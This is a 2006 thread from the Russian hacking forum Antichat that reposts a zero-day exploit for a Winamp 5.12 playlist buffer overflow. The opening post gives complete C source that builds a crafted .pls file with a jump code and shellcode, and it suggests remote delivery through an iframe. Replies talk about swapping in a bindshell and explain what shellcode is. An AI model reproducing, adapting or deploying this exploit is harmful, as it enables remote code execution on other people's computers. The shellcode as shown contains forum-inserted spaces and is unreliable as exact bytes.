ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > Windows
Перезагрузить страницу winamp0day Эксплоит
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

winamp0day Эксплоит
  #1  
Старый 30.01.2006, 23:34
tclover
Banned
Регистрация: 13.12.2005
Сообщений: 1,091
Провел на форуме:
9751364

Репутация: 1847


Exclamation winamp0day Эксплоит
Программа: Nullsoft Winamp 5.12 и более ранние версии
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.
Переполнение буфера обнаружено при обработке тега “File1” в “.pls” файлах. Удаленный пользователь может с помощью специально сформированного файла выполнить произвольный код на целевой системе.
Источник www.securitylab.ru/
Код:
-------------------------------------------------------------------
/*
*
* Winamp 5.12 Remote Buffer Overflow Universal Exploit (Zero-Day)
* Bug discovered & exploit coded by ATmaCA
* Web: http://www.spyinstructors.com && http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to Kozan
*
*/

/*
*
* Tested with :
* Winamp 5.12 on Win XP Pro Sp2
*
*/

/*
* Usage:
*
* Execute exploit, it will create "crafted.pls" in current directory.
* Duble click the file, or single click right and then select "open".
* And Winamp will launch a Calculator (calc.exe)
*
*/

/*
*
* For to use it remotly,
* make a html page containing an iframe linking to the .pls file.
*
* http://www.spyinstructors.com/atmaca...amp_ie_poc.htm
*
*/

#include <windows.h>
#include <stdio.h>

#define BUF_LEN 0x045D
#define PLAYLIST_FILE "crafted.pls"

char szPlayListHeader1[] = "[playlist]\r\nFile1=\\\\";
char szPlayListHeader2[] = "\r\nTitle1=~BOF~\r\nLength1=FFF\r\nNumberOfEntrie s=1\r\nVersion=2\r\n";

// Jump to shellcode
char jumpcode[] = "\x61\xD9\x02\x02\x83\xEC\x34\x83\xEC\x70\xFF\xE4" ;

// Harmless Calc.exe
char shellcode[] =
"\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\ xff\xff\xc0\x5e\x81\x76\x0e\x02"
"\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\ x02\xdd\x85\x08\x3e\x56\x72\x48"
"\x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\ x89\xe9\x85\x4c\xec\xec\xce\xd4"
"\xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\ x39\x89\x2a\x49\x77\x38\x85\x12"
"\x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\ x89\xc1\x85\x4c\xe9\x54\x52\x69"
"\x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\ x89\x9d\x02\xc6\x72\xc1\xa3\xc6"
"\x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\ x3e\x82\x3f\xbb\x62\x8b\x87\xb5"
"\x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\ x88\xd3\x59\xb2\xe5\xbe\x6f\x21"
"\x61\xdd\x0e\x4d";


int main(int argc,char *argv[])
{
printf("\nWinamp 5.12 Remote Buffer Overflow Universal Exploit");
printf("\nBug discovered & exploit coded by ATmaCA");
printf("\nWeb: http://www.spyinstructors.com && http://www.atmacasoft.com");
printf("\nE-Mail: atmaca@icqmail.com");
printf("\nCredit to Kozan");

FILE *File;
char *pszBuffer;

if ( (File = fopen(PLAYLIST_FILE,"w+b")) == NULL ) {
printf("\n [Err:] fopen()");
exit(1);
}

pszBuffer = (char*)malloc(BUF_LEN);
memset(pszBuffer,0x90,BUF_LEN);
memcpy(pszBuffer,szPlayListHeader1,sizeof(szPlayLi stHeader1)-1);
memcpy(pszBuffer+0x036C,shellcode,sizeof(shellcode )-1);
memcpy(pszBuffer+0x0412,jumpcode,sizeof(jumpcode)-1);
memcpy(pszBuffer+0x0422,szPlayListHeader2,sizeof(s zPlayListHeader2)-1);

fwrite(pszBuffer, BUF_LEN, 1,File);
fclose(File);

printf("\n\n" PLAYLIST_FILE " has been created in the current directory.\n");
return 1;
}
----------------------------------------------------------------------
 
Ответить с цитированием

  #2  
Старый 31.01.2006, 00:38
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию
Сейчас сделаем биндшелл...
 
Ответить с цитированием

  #3  
Старый 31.01.2006, 00:45
Vandal
Участник форума
Регистрация: 11.03.2005
Сообщений: 269
Провел на форуме:
1024281

Репутация: 23
Отправить сообщение для Vandal с помощью Yahoo
По умолчанию
Kez , что такое биндшелл
 
Ответить с цитированием

  #4  
Старый 31.01.2006, 01:15
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935

Репутация: 1202


Отправить сообщение для Elekt с помощью ICQ
По умолчанию
проверил на двух виндах и трёх винампах - калькулятор не запускается. Видимо, паблик шелкод с глюком.
 
Ответить с цитированием

  #5  
Старый 31.01.2006, 15:04
lexa
Участник форума
Регистрация: 14.01.2005
Сообщений: 169
Провел на форуме:
427901

Репутация: 23
Отправить сообщение для lexa с помощью ICQ
По умолчанию
Цитата:
Сообщение от Elekt  
проверил на двух виндах и трёх винампах - калькулятор не запускается. Видимо, паблик шелкод с глюком.
так сам сделай генераторов шелкода полно !!!!!
 
Ответить с цитированием

  #6  
Старый 31.01.2006, 15:26
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию
Вандал, купи январский нахер
 
Ответить с цитированием

  #7  
Старый 05.02.2006, 11:58
Prince_Dark
Новичок
Регистрация: 05.11.2005
Сообщений: 17
Провел на форуме:
118331

Репутация: 0
Отправить сообщение для Prince_Dark с помощью ICQ
По умолчанию
Цитата:
"\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\ x ff\xff\xc0\x5e\x81\x76\x0e\x02"
"\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\ x 02\xdd\x85\x08\x3e\x56\x72\x48"
"\x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\ x 89\xe9\x85\x4c\xec\xec\xce\xd4"
"\xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\ x 39\x89\x2a\x49\x77\x38\x85\x12"
"\x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\ x 89\xc1\x85\x4c\xe9\x54\x52\x69"
"\x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\ x 89\x9d\x02\xc6\x72\xc1\xa3\xc6"
"\x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\ x 3e\x82\x3f\xbb\x62\x8b\x87\xb5"
"\x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\ x 88\xd3\x59\xb2\xe5\xbe\x6f\x21"
"\x61\xdd\x0e\x4d";
некогда не знал что это такое и как это читать?
 
Ответить с цитированием

  #8  
Старый 05.02.2006, 13:46
Zadoxlik
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
Провел на форуме:
3369632

Репутация: 749


По умолчанию
Цитата:
Сообщение от Prince_Dark  
некогда не знал что это такое и как это читать?
Почитай КЕЗову статью про переполнение =)

Это машинный код в 16-ричном представлении. Иногда его комментируют соотв. строчками на ассемблере. А так при желании можно его самому дизассемблить
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как запустить эксплоит? Помогите разобраться sensible Форумы 7 25.01.2006 01:44
Помогите скомпилировать эксплоит Prince_Dark С/С++, C#, Delphi, .NET, Asm 3 25.01.2006 01:08
html эксплоит pantilxaker Уязвимости 4 23.01.2006 17:32
Вопрос про эксплоит из видео сoyl'a IPB < 2.0.4 rent0n Форумы 2 04.01.2006 16:11
Вопрос про эксплоит на форуме phpbb 2.0.8 dyx Форумы 2 12.04.2005 00:12



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ